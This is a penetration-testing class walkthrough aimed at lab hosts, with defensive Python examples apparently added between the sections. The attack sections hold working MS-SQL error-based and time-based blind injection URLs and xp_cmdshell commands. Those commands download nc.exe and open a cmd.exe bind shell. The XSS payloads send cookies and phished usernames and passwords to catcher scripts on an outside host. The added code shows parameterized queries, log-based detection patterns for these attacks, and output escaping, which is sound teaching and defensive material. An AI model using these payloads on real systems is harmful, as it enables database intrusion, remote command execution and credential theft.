timdatasentry

Untitled

Sep 7th, 2017
################
# Find/Replace #
################


tim -- Replace this with your name

172.16.16.233 -- Replace this with the instructor ip

172.16.16.142 -- Replace this with the webapp host ip

56789 -- Replace with a port that is not in use by another student



#########################################################################################
# Basic SQL Injection Walkthrough #
# ------------------------------- #
# A good reference for syntax is located at: #
# http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet #
#########################################################################################

Go to the address below in firefox:

http://172.16.16.142/book/Books.asp?STechID=2


Notice the parameter passing:

Books.asp ? STechID = 2

The ? lets you know that the site is using parameter passing. In this case the site is passing the
parameter name (STechID) and the parameter value (2) to the database.

Parameter Name = STechID
Parameter Value = 2
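As an added illustration (not part of the original lab notes), the Python below shows why the parameter passing above matters: when the value of STechID is pasted into the SQL text, the database parses it as SQL; when it is bound as a parameter, it stays data. It uses an in-memory SQLite table as a stand-in for the lab's MS SQL Books table (an assumption; the column and title values are constructed), so the error strings differ from the MS SQL ones shown further down, but the difference between concatenation and binding is the same.

```python
import sqlite3

# Constructed stand-in for the lab's Books table. The real lab runs MS SQL
# Server behind Books.asp; SQLite is used here only so the example runs offline.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE Books (STechID INTEGER, Title TEXT);
    INSERT INTO Books VALUES (1, 'SQL Basics');
    INSERT INTO Books VALUES (2, 'Classic ASP');
    INSERT INTO Books VALUES (3, 'IIS Hardening');
""")


def lookup_vulnerable(stech_id: str) -> list:
    """Builds the query by string concatenation, the way a vulnerable Books.asp does.
    Whatever follows '?STechID=' becomes part of the SQL statement itself."""
    sql = "SELECT Title FROM Books WHERE STechID = " + stech_id
    return [row[0] for row in _conn.execute(sql)]


def lookup_parameterized(stech_id: str) -> list:
    """Binds the value as a parameter: the driver sends it as data, never as SQL text.
    A string such as '2 or 1=1--' is compared against STechID as one opaque value
    and simply matches nothing."""
    sql = "SELECT Title FROM Books WHERE STechID = ?"
    return [row[0] for row in _conn.execute(sql, (stech_id,))]


def lookup_validated(stech_id: str) -> list:
    """Validates the type before binding: STechID is an integer id, so anything
    that is not one is rejected up front instead of ever reaching the database."""
    try:
        value = int(stech_id)
    except ValueError:
        return []
    sql = "SELECT Title FROM Books WHERE STechID = ?"
    return [row[0] for row in _conn.execute(sql, (value,))]


if __name__ == "__main__":
    for probe in ("2", "2 or 1=1--"):
        print(repr(probe), lookup_vulnerable(probe), lookup_parameterized(probe), lookup_validated(probe))
```

Calling each function with the plain value 2 returns one title; calling the concatenating version with a value that carries extra SQL returns every row, while the bound and validated versions return nothing. The error-based payloads later on this page work for the same reason the concatenating version does: the text reaches SQL Server's parser.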


###############################################
# ERROR SQL INJECTION - EXTRACT DATABASE USER #
###############################################

Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT user)--

Syntax error converting the nvarchar value '[DB USER]' to a column of data type int.



##################################################
# ERROR SQL INJECTION - EXTRACT DATABASE VERSION #
##################################################

Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (select @@VERSION)--



###############################################
# ERROR SQL INJECTION - EXTRACT DATABASE NAME #
###############################################

Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT db_name())--

Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.



#############################################
# ERROR SQL INJECTION - EXTRACT SERVER NAME #
#############################################

Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (@@SERVERNAME)--

Syntax error converting the nvarchar value '[SERVER NAME]' to a column of data type int.


Another option is:
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT @@servername)--



#########################################
# ERROR SQL INJECTION - List DATABASES #
#########################################

Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(0))--
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(1))--
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(2))--
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(3))--
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(4))--
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(N))--



#####################################################
# ERROR SQL INJECTION - EXTRACT 1st DATABASE TABLE #
#####################################################

Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--

Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.


####################################################
# ERROR SQL INJECTION - EXTRACT 2nd DATABASE TABLE #
####################################################

Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'Books')--

Syntax error converting the nvarchar value '[TABLE NAME 2]' to a column of data type int.


####################################################
# ERROR SQL INJECTION - EXTRACT 3rd DATABASE TABLE #
####################################################

Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'Buyers')--

Syntax error converting the nvarchar value '[TABLE NAME 3]' to a column of data type int.


####################################################
# ERROR SQL INJECTION - EXTRACT 4th DATABASE TABLE #
####################################################

Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'Orders')--

Syntax error converting the nvarchar value '[TABLE NAME 4]' to a column of data type int.



################################
# Basic MS-SQL Blind Injection #
################################

BLIND SQL INJECTION - DETECTION



###############################################
# BLIND SQL INJECTION - EXTRACT DATABASE USER #
###############################################
3 - Total Characters
http://172.16.16.142/book/Books.asp?STechID=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://172.16.16.142/book/Books.asp?STechID=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://172.16.16.142/book/Books.asp?STechID=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)

D - 1st Character
http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)

B - 2nd Character
http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),2,1)))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)

O - 3rd Character
http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)



##############################################
# Executing System Commands With xp_cmdshell #
##############################################

Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'ping -n 8 127.0.0.1'--


Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'dir+>+c:\inetpub\wwwroot\book\dir_tim.txt'--


Check it
--------
http://172.16.16.142/book/dir_tim.txt


Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'ipconfig+>+c:\inetpub\wwwroot\book\ipconfig_tim.txt'--


Check it
--------
http://172.16.16.142/book/ipconfig_tim.txt


Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'netstat+>+c:\inetpub\wwwroot\book\netstat_tim.txt'--


Check it
--------
http://172.16.16.142/book/netstat_tim.txt


Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'tftp -i 172.16.16.233 GET nc.exe c:\\tim_nc.exe'--


Go to the address below in firefox:
http://172.16.16.142/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'c:\\tim_nc.exe -l -p 56789 -e cmd.exe'--


Replace '56789' with a number between 1024 and 65535 that is not being used by another student in the class.


Open a duplicate session in Putty and type the following:
---------------------------------------------------------
nc 172.16.16.142 56789


Replace '56789' with a number between 1024 and 65535 that is not being used by another student in the class.
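Every request in the error-based, blind and xp_cmdshell sections above leaves a line in the web server's log, and that is where a defender would catch this lab being run for real. The Python below is an added example, not part of the original notes: it scans constructed IIS W3C-style log lines modelled on the requests on this page (the field layout, client address and timings are assumptions, and no line was captured from the lab server), tags each request by the technique it resembles, and uses the time-taken field to confirm that a WAITFOR DELAY request actually stalled the server.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines modelled on the requests in this walkthrough.
# Assumed field order (a common IIS layout): date time s-ip cs-method cs-uri-stem
# cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus
# sc-win32-status time-taken. The client address and timings are made up.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2017-09-07 10:01:02 172.16.16.142 GET /book/Books.asp STechID=2 80 - 172.16.16.50 Mozilla/5.0 200 0 0 15
2017-09-07 10:01:09 172.16.16.142 GET /book/Books.asp STechID=2%20or%201%20in%20(SELECT%20db_name())-- 80 - 172.16.16.50 Mozilla/5.0 500 0 0 20
2017-09-07 10:02:30 172.16.16.142 GET /book/Books.asp STechID=2;%20IF%20(LEN(USER)=3)%20WAITFOR%20DELAY%20'00:00:10'-- 80 - 172.16.16.50 Mozilla/5.0 200 0 0 10031
2017-09-07 10:05:12 172.16.16.142 GET /book/Books.asp STechID=1;exec+master..xp_cmdshell+'ipconfig+>+c:%5Cinetpub%5Cwwwroot%5Cbook%5Cipconfig_tim.txt'-- 80 - 172.16.16.50 Mozilla/5.0 200 0 0 45
2017-09-07 10:06:00 172.16.16.142 GET /book/Books.asp STechID=3 80 - 172.16.16.50 Mozilla/5.0 200 0 0 12
"""

# Signatures for the three techniques shown on this page, applied to the
# URL-decoded query string. The order only fixes the order of tags in a finding.
RULES = [
    ("error_based", re.compile(r"\bin\s*\(\s*select\b|@@version|@@servername|\bdb_name\s*\(|\bsysobjects\b", re.I)),
    ("time_based", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("cmd_exec", re.compile(r"\bxp_cmdshell\b", re.I)),
]


def classify_query(query: str) -> list:
    """Returns the names of every rule that matches the decoded query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(text: str, slow_ms: int = 5000) -> list:
    """Scans W3C-style lines and returns one finding per suspicious request.
    A WAITFOR request whose time-taken is at least slow_ms is tagged
    'delay_confirmed': a blind injection that really executed shows up as a
    server-side stall. A matching request answered with HTTP 500 is tagged
    'error_response', the footprint of the error-based extraction above."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 14:
            continue
        query, client, status, time_taken = fields[5], fields[8], fields[10], int(fields[13])
        tags = classify_query(query)
        if not tags:
            continue
        if "time_based" in tags and time_taken >= slow_ms:
            tags.append("delay_confirmed")
        if status == "500":
            tags.append("error_response")
        findings.append({
            "client": client,
            "status": status,
            "time_taken_ms": time_taken,
            "tags": tags,
            "query": unquote_plus(query),
        })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["status"], finding["time_taken_ms"], finding["tags"])
```

Point scan_log at real log text and it reports the client, status, latency and matched technique for each hit; the two ordinary lookups produce no finding. On the database side the matching check is that xp_cmdshell stays disabled (it is off by default and is only switched on through sp_configure) and that the application's login is not a sysadmin, since xp_cmdshell needs that role or an explicitly configured proxy account; and the 'Syntax error converting the nvarchar value' messages this page relies on only reach the browser because the application returns raw database errors instead of a generic error page.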



#################################
# Really basic XSS walk-through #
#################################


1. Use Firefox to browse to the following location:

http://199.204.214.176/xss_practice/

A really simple search page that is vulnerable should come up.


2. In the search box type:

<script>alert('So this is XSS')</script>

This should pop up an alert window with your message in it, proving XSS is in fact possible.


3. In the search box type:

<script>alert(document.cookie)</script>

This should pop up an alert window with your cookie in it, proving XSS is in fact possible and your cookie can be accessed.


4. Now replace that alert script with:

<script>document.location="http://199.204.214.176/xss_practice/cookie_catcher.php?c="+document.cookie</script>

This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.


5. Now view the stolen cookie at:
http://199.204.214.176/xss_practice/cookie_stealer_logs.html

The cookie catcher writes to this file; all we have to do is make sure the file is writable.



############################
# A Better Way To Demo XSS #
############################

Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.

Use Firefox to browse to the following location:

http://199.204.214.176/xss_practice/


Paste this in the search box
----------------------------

Option 1
--------

<script>
password=prompt('Your session is expired. Please enter your password to continue',' ');
document.write("<img src=\"http://199.204.214.176/xss_practice/passwordgrabber.php?password=" +password+"\">");
</script>

Now view the stolen password at:
http://199.204.214.176/xss_practice/passwords.html


Option 2
--------
<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img src=\"http://199.204.214.176/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
</script>

Now view the stolen username and password at:
http://199.204.214.176/xss_practice/username_password_logs.html
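Both XSS sections above work for one reason: the practice page writes the search term back into its HTML unchanged. The Python below is an added example, not code from the practice page or the original notes, and it stands in for the server side of that search page (the page structure and the session cookie name are assumptions; the three inputs are constructed to match what the walkthrough types into the box). It shows the reflected term rendered raw beside the same term rendered through context-aware output encoding, plus the cookie attributes that blunt steps 3 to 5 even when encoding is missed.

```python
import html

# Constructed inputs modelled on what the walkthrough types into the search box;
# none of them were captured from the practice server.
BENIGN_QUERY = "asp classic"
COOKIE_PAYLOAD = "<script>alert(document.cookie)</script>"
PROMPT_PAYLOAD = "<script>password=prompt('Your session is expired');</script>"


def render_results_vulnerable(query: str) -> str:
    """Reflects the search term into the page verbatim, as the practice page does,
    so the browser parses a <script> inside the term as a real script element."""
    return "<p>Results for: " + query + "</p>"


def render_results_escaped(query: str) -> str:
    """Encodes the term for an HTML text-node context before reflecting it:
    <, >, & and both quote characters become entities, so the term is displayed
    rather than executed. This single change defeats every payload on this page."""
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"


def session_cookie_headers(session_id: str) -> dict:
    """Defence in depth for the cookie-theft steps: HttpOnly keeps document.cookie
    from exposing the session id even if a script does get injected, Secure keeps
    it off plaintext HTTP, and SameSite limits cross-site sending."""
    return {
        "Set-Cookie": "session=" + session_id + "; HttpOnly; Secure; SameSite=Lax",
    }


def has_script_element(document: str) -> bool:
    """Small check used to confirm a rendered page carries no script element."""
    return "<script" in document.lower()


if __name__ == "__main__":
    for probe in (BENIGN_QUERY, COOKIE_PAYLOAD, PROMPT_PAYLOAD):
        print("raw:    ", render_results_vulnerable(probe))
        print("escaped:", render_results_escaped(probe))
```

Two caveats worth keeping in mind when reading the walkthrough. HttpOnly stops steps 3 to 5, where the script reads document.cookie, but does nothing for Option 1 and Option 2, where the injected script never touches the cookie and simply asks the user to type a password; only encoding the reflected term (or rejecting markup in it) removes that. And a Content-Security-Policy restricted to the page's own origin would not help in this particular lab either, because the cookie catcher and password grabber sit on the same host as the search page.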